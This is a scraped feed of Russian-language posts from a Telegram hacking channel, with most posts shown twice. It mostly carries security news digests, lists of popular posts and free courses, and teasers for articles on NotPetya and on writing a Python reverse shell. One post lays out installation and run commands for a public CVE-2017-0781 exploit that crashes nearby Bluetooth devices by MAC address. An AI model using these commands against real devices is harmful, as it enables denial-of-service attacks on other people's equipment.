#обзор
Историческая вирусология: Петя ( NotPetya) как же это было на самом деле - история, хронология, анализ
Историческая вирусология: Петя ( NotPetya) как же это было на самом деле - история, хронология, анализ
Telegraph
Историческая вирусология: Петя ( NotPetya) как же это было на самом деле - история, хронология, анализ
Предисловие Тик-тик-тик - это звук обычных механических часов. А значит, время идет. Что мы планировали? Эпоху великих изменений, планировали вывести монтаж и подачу материала на новый уровень. Но это все в прошлом, привет-привет, дорогие друзья, с вами…
This media is not supported in your browser
VIEW IN TELEGRAM
#дайджест
1. Шифровальщик Wagner: вымогательство, вербовка или пустой звук?
Подробней
2. Нейросети настолько хороши в создании подделок, что даже специализированные сервисы не могут их распознать
Подробней
3. Кибератака на «Дозор-Телепорт»: кто и зачем взломал оператора спутниковой связи
Подробней
4. Microsoft предупреждает об атаках российских хакеров
Подробней
1. Шифровальщик Wagner: вымогательство, вербовка или пустой звук?
Подробней
2. Нейросети настолько хороши в создании подделок, что даже специализированные сервисы не могут их распознать
Подробней
3. Кибератака на «Дозор-Телепорт»: кто и зачем взломал оператора спутниковой связи
Подробней
4. Microsoft предупреждает об атаках российских хакеров
Подробней
MITRE опубликовала топ-25 самых опасных багов в ПО (Common Weakness Enumeration) за последние два года. Речь идет именно о CWE, которые как раз приводят к появлению уязвимостей.
Life-Hack [Жизнь-Взлом]/Хакинг
#новость
Life-Hack [Жизнь-Взлом]/Хакинг
#новость
#подборка
Топ популярных постов за прошедшую неделю:
1. Краткий справочник по логам безопасности Windows для безопасников
2. Пост-эксплуатация Linux. Поднимаемся от юзера до бога в несколько кликов
3. Способы получения обратного соединения (Reverse shell)
4. Как узнать информацию о пользователе Telegram
5. reconFTW — комбайн для этичного хакера, который автоматизирует весь процесс разведки
6. Телеграм Ботнет
7. Как узнать все, что происходит с твоей Linux-машиной
8. Безопасность превыше всего. 9 простых трюков, которые сделают жизнь линуксоида секьюрнее
9. Руководство по подготовке сертифицированного этичного хакера (CEH), русская версия (вольный перевод TimCore)
Life-Hack [Жизнь-Взлом]/Хакинг
Топ популярных постов за прошедшую неделю:
1. Краткий справочник по логам безопасности Windows для безопасников
2. Пост-эксплуатация Linux. Поднимаемся от юзера до бога в несколько кликов
3. Способы получения обратного соединения (Reverse shell)
4. Как узнать информацию о пользователе Telegram
5. reconFTW — комбайн для этичного хакера, который автоматизирует весь процесс разведки
6. Телеграм Ботнет
7. Как узнать все, что происходит с твоей Linux-машиной
8. Безопасность превыше всего. 9 простых трюков, которые сделают жизнь линуксоида секьюрнее
9. Руководство по подготовке сертифицированного этичного хакера (CEH), русская версия (вольный перевод TimCore)
Life-Hack [Жизнь-Взлом]/Хакинг
Кладем Bluetooth-устройство через Termux с помощью эксплойта
Информация предоставлена исключительно для ознакомительных целей!
Установка:
apt install python2.7 python-pip python-dev git libssl-dev libffi-dev build-essential
pip install —upgrade pip
pip install —upgrade pwntools
apt-get install bluetooth libbluetooth-dev
pip install pybluez
git clone https://github.com/ojasookert/CVE-2017-0781.git
Использование
(❗️нужен MAC адрес❗️):
btmgmt —index 0
find
python CVE-2017-0781.py TARGET= (МАC ADDRESS)
Life-Hack [Жизнь-Взлом]/Хакинг
#рекомендация
Информация предоставлена исключительно для ознакомительных целей!
Установка:
apt install python2.7 python-pip python-dev git libssl-dev libffi-dev build-essential
pip install —upgrade pip
pip install —upgrade pwntools
apt-get install bluetooth libbluetooth-dev
pip install pybluez
git clone https://github.com/ojasookert/CVE-2017-0781.git
Использование
(❗️нужен MAC адрес❗️):
btmgmt —index 0
find
python CVE-2017-0781.py TARGET= (МАC ADDRESS)
Life-Hack [Жизнь-Взлом]/Хакинг
#рекомендация
Please open Telegram to view this post
VIEW IN TELEGRAM
This media is not supported in your browser
VIEW IN TELEGRAM
#дайджест
1. Как взломать сайт за 5 минут: уязвимость в плагине Ultimate Member дает полный доступ к WordPress
Подробней
2. Поддельная реклама в поиске WinSCP
распространяет вредоносный код
Подробней
3. Число участников хактивистского проекта DDoSia возросло
на 2400%
Подробней
4. Самые важные события в мире инфосека за
июнь
Подробней
1. Как взломать сайт за 5 минут: уязвимость в плагине Ultimate Member дает полный доступ к WordPress
Подробней
2. Поддельная реклама в поиске WinSCP
распространяет вредоносный код
Подробней
3. Число участников хактивистского проекта DDoSia возросло
на 2400%
Подробней
4. Самые важные события в мире инфосека за
июнь
Подробней
This media is not supported in your browser
VIEW IN TELEGRAM
#дайджест
1. В Африке задержан предполагаемый лидер киберпреступной группировки OPERA1ER
Подробней
2. Программисты в классическом понимании исчезнут уже в течение пяти лет
Подробней
3. Пираты против патриотов: кто победит в битве за контент
Подробней
4. Мексиканский хакер похитил свыше 350 тысяч евро у банковских пользователей по всему миру
Подробней
1. В Африке задержан предполагаемый лидер киберпреступной группировки OPERA1ER
Подробней
2. Программисты в классическом понимании исчезнут уже в течение пяти лет
Подробней
3. Пираты против патриотов: кто победит в битве за контент
Подробней
4. Мексиканский хакер похитил свыше 350 тысяч евро у банковских пользователей по всему миру
Подробней
10 Бесплатных курсов по кибербезопасности:
1. Stepik Математика в кибербезопасности
2. Youtube Этичный хакинг
3. Курсера Cybersecurity Roles, Processes & Operating System Security
4. Stepik Кибербезопасность
5. Анализ безопасности веб-проектов
6. Технические методы и средства, технологии защиты информации
7. Школа системного администратора · курсы-по-ит.рф
8. Курс кибербезопасности для начинающих, UdeMy
9. Обеспечение безопасности цифровой демократии, Мичиганский университет
10. Введение в ИТ и кибербезопасность, Cybrary
#рекомендация
Life-Hack [Жизнь-Взлом]/Хакинг
1. Stepik Математика в кибербезопасности
2. Youtube Этичный хакинг
3. Курсера Cybersecurity Roles, Processes & Operating System Security
4. Stepik Кибербезопасность
5. Анализ безопасности веб-проектов
6. Технические методы и средства, технологии защиты информации
7. Школа системного администратора · курсы-по-ит.рф
8. Курс кибербезопасности для начинающих, UdeMy
9. Обеспечение безопасности цифровой демократии, Мичиганский университет
10. Введение в ИТ и кибербезопасность, Cybrary
#рекомендация
Life-Hack [Жизнь-Взлом]/Хакинг
Ядовитое подключение. Пишем обратную оболочку используя Python
Давай вспомним, какой самый частый прием хакеры используют, чтобы завладеть устройством? Ответ на такой вопрос не заставит долго ждать. Вирусы - это главное оружие каждого хакера. Существует огромное количество вредоносного ПО, начиная со стиллеров и заканчивая ботнетами, способными управлять миллионами устройств. Но в этой статье я расскажу тебе самый простой способ получить доступ к консоли другого компьютера при помощи кода на Python.
Читать статью тут!
#статья
Life-Hack [Жизнь-Взлом]/Хакинг
Давай вспомним, какой самый частый прием хакеры используют, чтобы завладеть устройством? Ответ на такой вопрос не заставит долго ждать. Вирусы - это главное оружие каждого хакера. Существует огромное количество вредоносного ПО, начиная со стиллеров и заканчивая ботнетами, способными управлять миллионами устройств. Но в этой статье я расскажу тебе самый простой способ получить доступ к консоли другого компьютера при помощи кода на Python.
Читать статью тут!
#статья
Life-Hack [Жизнь-Взлом]/Хакинг